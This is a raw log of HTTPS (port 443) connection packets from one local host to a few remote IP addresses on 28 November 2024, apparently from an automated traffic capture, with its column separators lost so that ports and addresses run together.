                                                                                                                                          Nov 28, 2024 11:33:03.784910917 CET49841443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.784910917 CET49841443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.784910917 CET49841443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.786185026 CET49841443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.786192894 CET443498415.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.788736105 CET49849443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.788746119 CET443498495.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.788810968 CET49849443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.789019108 CET49849443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.789028883 CET443498495.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.790214062 CET49850443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.790240049 CET443498505.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.790302992 CET49850443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.790496111 CET49850443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.790508986 CET443498505.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.796116114 CET443498365.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.796191931 CET49836443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.875571966 CET443498365.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.875646114 CET49836443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.890357971 CET443498365.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.890425920 CET49836443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.904751062 CET443498365.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.904823065 CET49836443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.917855978 CET443498365.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.917994022 CET49836443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.922354937 CET443498365.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.922405005 CET49836443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.922419071 CET443498365.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.922447920 CET443498365.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.922489882 CET49836443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.923029900 CET49836443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.923043013 CET443498365.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.926470995 CET49851443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.926485062 CET443498515.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:03.926548004 CET49851443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.926800013 CET49851443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:03.926809072 CET443498515.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.030424118 CET4434983213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.030972004 CET49832443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:04.030993938 CET4434983213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.031424046 CET49832443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:04.031430960 CET4434983213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.474437952 CET4434983213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.474505901 CET4434983213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.474740982 CET49832443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:04.474780083 CET49832443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:04.474780083 CET49832443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:04.474797964 CET4434983213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.474807978 CET4434983213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.477459908 CET49852443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:04.477489948 CET4434985213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.477562904 CET49852443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:04.477710962 CET49852443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:04.477727890 CET4434985213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.551417112 CET443498395.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.551671982 CET49839443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:04.551687002 CET443498395.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.552093029 CET443498395.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.552274942 CET49839443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:04.552820921 CET443498395.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.552891016 CET49839443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:04.553237915 CET49839443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:04.553306103 CET443498395.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.553473949 CET49839443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:04.553488016 CET443498395.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.603491068 CET49839443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:04.711843967 CET4434984313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.712316990 CET49843443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:04.712337017 CET4434984313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.712793112 CET49843443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:04.712798119 CET4434984313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.726094961 CET4434984413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.726586103 CET49844443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:04.726632118 CET4434984413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.727195024 CET49844443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:04.727204084 CET4434984413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.973057032 CET443498475.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.973486900 CET49847443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:04.973517895 CET443498475.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.973596096 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.973778963 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:04.973798990 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.973912954 CET443498475.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.974167109 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.974230051 CET49847443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:04.974291086 CET443498475.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.974503040 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:04.974565983 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:04.974652052 CET49847443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:04.974689960 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.012726068 CET49853443192.168.2.4142.250.181.100
                                                                                                                                          Nov 28, 2024 11:33:05.012768030 CET44349853142.250.181.100192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.012881994 CET49853443192.168.2.4142.250.181.100
                                                                                                                                          Nov 28, 2024 11:33:05.013114929 CET49853443192.168.2.4142.250.181.100
                                                                                                                                          Nov 28, 2024 11:33:05.013128042 CET44349853142.250.181.100192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.015332937 CET443498475.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.015332937 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.051014900 CET4434984513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.051531076 CET49845443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:05.051549911 CET4434984513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.052021027 CET49845443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:05.052026033 CET4434984513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.112114906 CET443498395.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.112138987 CET443498395.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.112147093 CET443498395.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.112215996 CET49839443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.112226009 CET443498395.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.118886948 CET4434984613.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.119335890 CET49846443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:05.119355917 CET4434984613.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.119801044 CET49846443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:05.119807959 CET4434984613.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.155307055 CET49839443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.165364981 CET4434984313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.165427923 CET4434984313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.165520906 CET49843443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:05.165721893 CET49843443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:05.165739059 CET4434984313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.165779114 CET49843443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:05.165786982 CET4434984313.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.169425964 CET49854443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:05.169457912 CET4434985413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.169528961 CET49854443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:05.169657946 CET49854443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:05.169670105 CET4434985413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.170788050 CET4434984413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.170840979 CET4434984413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.172885895 CET49844443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:05.172930002 CET49844443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:05.172947884 CET4434984413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.172971964 CET49844443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:05.172979116 CET4434984413.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.177669048 CET49855443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:05.177706003 CET4434985513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.177787066 CET49855443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:05.177891970 CET49855443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:05.177902937 CET4434985513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.191962957 CET443498395.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.191972017 CET443498395.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.192051888 CET49839443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.288876057 CET443498505.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.293252945 CET49850443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.293272018 CET443498505.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.293745041 CET443498505.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.295025110 CET443498395.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.295033932 CET443498395.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.295097113 CET49839443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.295484066 CET49850443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.295669079 CET49850443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.295690060 CET443498505.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.320271015 CET443498395.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.320278883 CET443498395.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.320373058 CET49839443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.340142965 CET49850443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.345592022 CET443498395.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.345598936 CET443498395.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.345679045 CET49839443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.384085894 CET443498395.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.384094954 CET443498395.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.384175062 CET49839443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.387893915 CET443498395.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.387979984 CET443498395.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.388015032 CET49839443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.388031960 CET49839443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.388545990 CET49839443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.388575077 CET443498395.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.397943974 CET49856443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.397965908 CET443498565.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.398030043 CET49856443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.398418903 CET49856443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.398432970 CET443498565.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.495748997 CET4434984513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.495812893 CET4434984513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.495891094 CET49845443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:05.531100988 CET443498475.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.531126976 CET443498475.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.531172991 CET443498475.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.531207085 CET49847443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.531256914 CET49847443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.546586990 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.546608925 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.546694040 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.546715021 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.563438892 CET4434984613.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.563481092 CET4434984613.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.563553095 CET49846443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:05.600927114 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.622267962 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.622278929 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.622395039 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.673451900 CET49847443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.673468113 CET443498475.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.697840929 CET49845443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:05.697865963 CET4434984513.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.713191986 CET49857443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.713238955 CET443498575.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.713316917 CET49857443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.713535070 CET49857443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.713550091 CET443498575.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.721101999 CET49846443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:05.721101999 CET49846443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:05.721112967 CET4434984613.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.721123934 CET4434984613.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.728616953 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.728629112 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.728710890 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.750941038 CET49858443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:05.750957012 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.750967979 CET4434985813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.750969887 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.751039982 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.751070976 CET49858443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:05.751995087 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.757287979 CET49859443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:05.757313013 CET4434985913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.757447004 CET49859443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:05.757540941 CET49858443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:05.757549047 CET4434985813.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.757818937 CET49859443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:05.757833004 CET4434985913.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.780706882 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.780719042 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.780776978 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.824047089 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.824054003 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.824120045 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.837457895 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.837465048 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.837526083 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.930016041 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.930085897 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.943293095 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.943361044 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.956516981 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.956597090 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.973567963 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.973634005 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.985677004 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.985738993 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:05.998020887 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:05.998080969 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.010215998 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.010284901 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.052126884 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.052198887 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.126224041 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.126298904 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.137341976 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.137517929 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.145327091 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.145396948 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.153496981 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.153578997 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.164096117 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.164258957 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.172259092 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.172344923 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.174381971 CET443498155.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.174638987 CET49815443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.174659014 CET443498155.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.175055027 CET443498155.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.175123930 CET49815443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.175796032 CET443498155.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.175846100 CET49815443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.176023006 CET49815443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.176084995 CET443498155.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.176158905 CET49815443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.176171064 CET443498155.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.177613020 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.177690983 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.183079958 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.183173895 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.189949989 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.190010071 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.195295095 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.195373058 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.201530933 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.201606035 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.206837893 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.206912994 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.225611925 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.225692987 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.229315042 CET49815443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.230048895 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.230123997 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.235491991 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.235562086 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.324702978 CET4434985213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.325541973 CET49852443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:06.325563908 CET4434985213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.325983047 CET49852443192.168.2.413.107.246.63
                                                                                                                                          Nov 28, 2024 11:33:06.325988054 CET4434985213.107.246.63192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.326641083 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.326729059 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.330110073 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.330192089 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.334083080 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.334151983 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.339140892 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.339240074 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.343102932 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.343197107 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.346916914 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.346980095 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.352005959 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.352070093 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.355866909 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.355931044 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.359822989 CET443498485.57.41.119192.168.2.4
                                                                                                                                          Nov 28, 2024 11:33:06.359888077 CET49848443192.168.2.45.57.41.119
                                                                                                                                          Nov 28, 2024 11:33:06.363552094 CET443498485.57.41.119192.168.2.4
